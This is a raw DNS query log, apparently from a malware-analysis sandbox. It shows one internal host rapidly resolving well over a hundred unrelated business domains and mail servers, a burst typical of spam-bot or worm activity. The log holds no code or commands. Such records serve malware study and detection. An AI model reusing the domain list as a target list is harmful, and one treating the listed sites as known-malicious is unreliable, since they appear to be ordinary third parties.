                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.153801918 CET192.168.2.58.8.8.80x35b5Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.157475948 CET192.168.2.58.8.8.80xef7dStandard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.176119089 CET192.168.2.58.8.8.80xda3fStandard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.212567091 CET192.168.2.58.8.8.80xfb01Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.295207024 CET192.168.2.58.8.8.80x95efStandard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.374713898 CET192.168.2.58.8.8.80x824aStandard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.424125910 CET192.168.2.58.8.8.80x7b93Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.430707932 CET192.168.2.58.8.8.80xb578Standard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.542061090 CET192.168.2.58.8.8.80xaf48Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.638761997 CET192.168.2.58.8.8.80x9befStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.642837048 CET192.168.2.58.8.8.80x6ab4Standard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.708786964 CET192.168.2.58.8.8.80xd046Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.708787918 CET192.168.2.58.8.8.80xfcecStandard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.708959103 CET192.168.2.58.8.8.80x2129Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.724221945 CET192.168.2.58.8.8.80xb6ffStandard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.785558939 CET192.168.2.58.8.8.80xefc5Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.796241045 CET192.168.2.58.8.8.80xbeffStandard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.824583054 CET192.168.2.58.8.8.80xdd02Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.837600946 CET192.168.2.58.8.8.80x9ba9Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.837600946 CET192.168.2.58.8.8.80x9d93Standard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.837773085 CET192.168.2.58.8.8.80x2055Standard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.837773085 CET192.168.2.58.8.8.80x5761Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.837887049 CET192.168.2.58.8.8.80x6901Standard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.837887049 CET192.168.2.58.8.8.80x334bStandard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.852953911 CET192.168.2.58.8.8.80xe598Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.907939911 CET192.168.2.58.8.8.80xf25eStandard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.910389900 CET192.168.2.58.8.8.80x32bcStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.932794094 CET192.168.2.58.8.8.80xb543Standard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.934748888 CET192.168.2.58.8.8.80xe5b6Standard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:01.935784101 CET192.168.2.58.8.8.80xb393Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.021816015 CET192.168.2.58.8.8.80x95b0Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.024385929 CET192.168.2.58.8.8.80xb0dbStandard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.033746004 CET192.168.2.58.8.8.80x674bStandard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.044964075 CET192.168.2.58.8.8.80x81f6Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.076478004 CET192.168.2.58.8.8.80xfa1cStandard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.080806017 CET192.168.2.58.8.8.80xc76cStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.116287947 CET192.168.2.58.8.8.80x86b8Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.117217064 CET192.168.2.58.8.8.80xa70cStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.126769066 CET192.168.2.58.8.8.80x156aStandard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.152767897 CET192.168.2.58.8.8.80xd261Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.153911114 CET192.168.2.58.8.8.80x6bfbStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.166085958 CET192.168.2.58.8.8.80xac65Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.218563080 CET192.168.2.58.8.8.80x5a01Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.219710112 CET192.168.2.58.8.8.80xfb84Standard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.241274118 CET192.168.2.58.8.8.80x7058Standard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.242283106 CET192.168.2.58.8.8.80x3629Standard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.256817102 CET192.168.2.58.8.8.80xbe46Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.276680946 CET192.168.2.58.8.8.80x5b00Standard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.278215885 CET192.168.2.58.8.8.80x964Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.295629978 CET192.168.2.58.8.8.80x328dStandard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.398519039 CET192.168.2.58.8.8.80x5cbStandard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.413501024 CET192.168.2.58.8.8.80x98b3Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.453131914 CET192.168.2.58.8.8.80x372bStandard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.468909979 CET192.168.2.58.8.8.80x8a82Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.471663952 CET192.168.2.58.8.8.80x3882Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.483839989 CET192.168.2.58.8.8.80x3ffcStandard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.488614082 CET192.168.2.58.8.8.80xecaStandard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.489005089 CET192.168.2.58.8.8.80x51e5Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.489732981 CET192.168.2.58.8.8.80xcfbfStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.495291948 CET192.168.2.58.8.8.80x887dStandard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.505449057 CET192.168.2.58.8.8.80xc912Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.518136024 CET192.168.2.58.8.8.80x46fbStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.518836975 CET192.168.2.58.8.8.80x86d5Standard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.535125971 CET192.168.2.58.8.8.80x105dStandard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.548207998 CET192.168.2.58.8.8.80xc2cdStandard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.564694881 CET192.168.2.58.8.8.80x6785Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.575526953 CET192.168.2.58.8.8.80xa6baStandard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.576538086 CET192.168.2.58.8.8.80xb1d2Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.587011099 CET192.168.2.58.8.8.80x271fStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.644690037 CET192.168.2.58.8.8.80x7f1eStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.646773100 CET192.168.2.58.8.8.80x9a2aStandard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.682627916 CET192.168.2.58.8.8.80x9f9eStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.691090107 CET192.168.2.58.8.8.80x3773Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.760698080 CET192.168.2.58.8.8.80xbca1Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.771677971 CET192.168.2.58.8.8.80x13a0Standard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.778915882 CET192.168.2.58.8.8.80xc080Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.779194117 CET192.168.2.58.8.8.80x6ea7Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.812786102 CET192.168.2.58.8.8.80x434fStandard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.814486027 CET192.168.2.58.8.8.80xad01Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.825002909 CET192.168.2.58.8.8.80x3dc5Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.902242899 CET192.168.2.58.8.8.80x19baStandard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.912482977 CET192.168.2.58.8.8.80x676eStandard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.935307026 CET192.168.2.58.8.8.80xa3beStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:02.992480040 CET192.168.2.58.8.8.80x1833Standard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.084064007 CET192.168.2.58.8.8.80xaf91Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.106980085 CET192.168.2.58.8.8.80x1536Standard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.107244015 CET192.168.2.58.8.8.80x4139Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.109003067 CET192.168.2.58.8.8.80x4e1eStandard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.127949953 CET192.168.2.58.8.8.80x394dStandard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.140187025 CET192.168.2.58.8.8.80x59caStandard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.143255949 CET192.168.2.58.8.8.80xfa06Standard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.207325935 CET192.168.2.58.8.8.80x1120Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.298578024 CET192.168.2.58.8.8.80x4e3Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.301439047 CET192.168.2.58.8.8.80x1eb3Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.304420948 CET192.168.2.58.8.8.80x41b5Standard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.309775114 CET192.168.2.58.8.8.80xc621Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.323467016 CET192.168.2.58.8.8.80x10afStandard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.336810112 CET192.168.2.58.8.8.80xc64dStandard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.340262890 CET192.168.2.58.8.8.80x2a35Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.356410980 CET192.168.2.58.8.8.80x8213Standard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.358795881 CET192.168.2.58.8.8.80xcc10Standard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.388328075 CET192.168.2.58.8.8.80x434eStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.404859066 CET192.168.2.58.8.8.80xf7b8Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.405879021 CET192.168.2.58.8.8.80x5edeStandard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.406084061 CET192.168.2.58.8.8.80x5dc2Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.463169098 CET192.168.2.58.8.8.80xe6d4Standard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.472567081 CET192.168.2.58.8.8.80xfb5Standard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.492856979 CET192.168.2.58.8.8.80x8a82Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.504933119 CET192.168.2.58.8.8.80x3ca7Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.511545897 CET192.168.2.58.8.8.80x887dStandard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.530340910 CET192.168.2.58.8.8.80xf837Standard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.563585997 CET192.168.2.58.8.8.80xeeb3Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.563585997 CET192.168.2.58.8.8.80x29e0Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.611671925 CET192.168.2.58.8.8.80xa8fdStandard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.640979052 CET192.168.2.58.8.8.80xc902Standard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.641765118 CET192.168.2.58.8.8.80xd091Standard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.647058964 CET192.168.2.58.8.8.80x1624Standard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.647154093 CET192.168.2.58.8.8.80x1653Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.648515940 CET192.168.2.58.8.8.80x61aStandard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.654654980 CET192.168.2.58.8.8.80xd6e4Standard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.752383947 CET192.168.2.58.8.8.80x3773Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.752796888 CET192.168.2.58.8.8.80x9f9eStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.801734924 CET192.168.2.58.8.8.80x46ccStandard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.810102940 CET192.168.2.58.8.8.80x1019Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.838471889 CET192.168.2.58.8.8.80xe0bdStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.847650051 CET192.168.2.58.8.8.80xa53bStandard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.865878105 CET192.168.2.58.8.8.80x8570Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.922897100 CET192.168.2.58.8.8.80xb1cdStandard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.924372911 CET192.168.2.58.8.8.80xaa7cStandard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.924372911 CET192.168.2.58.8.8.80xcc0aStandard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:03.955903053 CET192.168.2.58.8.8.80x7a48Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.066231012 CET192.168.2.58.8.8.80x2f7fStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.094454050 CET192.168.2.58.8.8.80x616bStandard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.148113966 CET192.168.2.58.8.8.80x2b39Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.156419992 CET192.168.2.58.8.8.80xa109Standard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.245346069 CET192.168.2.58.8.8.80x97e5Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.370523930 CET192.168.2.58.8.8.80x2169Standard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.415390968 CET192.168.2.58.8.8.80x3542Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.462968111 CET192.168.2.58.8.8.80x30f6Standard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.482904911 CET192.168.2.58.8.8.80x2348Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.531785965 CET192.168.2.58.8.8.80xde56Standard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.546360970 CET192.168.2.58.8.8.80x3ca7Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.579488039 CET192.168.2.58.8.8.80x6cb5Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.605745077 CET192.168.2.58.8.8.80x5a19Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.815516949 CET192.168.2.58.8.8.80xaa2eStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.816116095 CET192.168.2.58.8.8.80x146aStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.821572065 CET192.168.2.58.8.8.80xbfe3Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.905323982 CET192.168.2.58.8.8.80xbaeStandard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.992345095 CET192.168.2.58.8.8.80x4fe0Standard query (0)603888.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:04.997854948 CET192.168.2.58.8.8.80x458bStandard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.118969917 CET192.168.2.58.8.8.80x28d9Standard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.161750078 CET192.168.2.58.8.8.80x597eStandard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.203454971 CET192.168.2.58.8.8.80x8a32Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.206234932 CET192.168.2.58.8.8.80x4d2aStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.207362890 CET192.168.2.58.8.8.80x51abStandard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.208264112 CET192.168.2.58.8.8.80xd8a6Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.212847948 CET192.168.2.58.8.8.80x76cdStandard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.223885059 CET192.168.2.58.8.8.80xc6a0Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.259938955 CET192.168.2.58.8.8.80x2dd5Standard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.259938955 CET192.168.2.58.8.8.80x4422Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.261780977 CET192.168.2.58.8.8.80xcd3cStandard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.287729979 CET192.168.2.58.8.8.80x5438Standard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.445487976 CET192.168.2.58.8.8.80xaac7Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.445487976 CET192.168.2.58.8.8.80xe20dStandard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.481296062 CET192.168.2.58.8.8.80xee20Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.618165016 CET192.168.2.58.8.8.80xed74Standard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.620002985 CET192.168.2.58.8.8.80x88cfStandard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.626549959 CET192.168.2.58.8.8.80x5a19Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.629241943 CET192.168.2.58.8.8.80xae47Standard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.642802954 CET192.168.2.58.8.8.80xd192Standard query (0)shenhgts.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.719750881 CET192.168.2.58.8.8.80xefdcStandard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:05.720069885 CET192.168.2.58.8.8.80xcabdStandard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
